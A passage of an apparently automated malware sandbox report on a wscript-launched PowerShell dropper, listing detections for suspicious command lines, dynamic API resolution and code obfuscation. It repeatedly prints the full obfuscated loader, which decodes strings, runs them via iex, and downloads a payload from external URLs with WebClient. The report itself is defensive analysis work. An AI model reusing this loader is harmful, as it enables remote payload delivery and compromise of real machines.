,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighe
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighe	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighe	Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighe
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighe	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighe	Jump to behavior

Contains functionality to dynamically determine API calls

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 19_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,

19_2_004044A4

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF886FB3025 pushad ; ret	2_2_00007FF886FB313A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_0481EC78 pushfd ; retf	5_2_0481EC79
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_07681FB2 push eax; mov dword ptr [esp], ecx	5_2_076821B4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_08F648A4 push ebx; ret	5_2_08F648A5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_08F62845 push cs; iretd	5_2_08F6284F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_08F64D9F push ss; ret	5_2_08F64DAC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_08F63571 push esp; ret	5_2_08F6358B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_08F63118 push eax; iretd	5_2_08F6311A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_08F652D2 push cs; ret	5_2_08F65301
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_08F62AAA push 00000009h; iretd	5_2_08F62AB7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_08F62291 push edx; retf	5_2_08F6229A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_08F63E85 push ebp; ret	5_2_08F63EC9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_08F60364 pushfd ; retf	5_2_08F60374
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_22B31219 push esp; iretd	10_2_22B3121A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_22B22806 push ecx; ret	10_2_22B22819
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_03A80364 pushfd ; retf	10_2_03A80374
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_03A82AAA push 00000009h; iretd	10_2_03A82AB7
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_03A83E85 push ebp; ret	10_2_03A83EC9
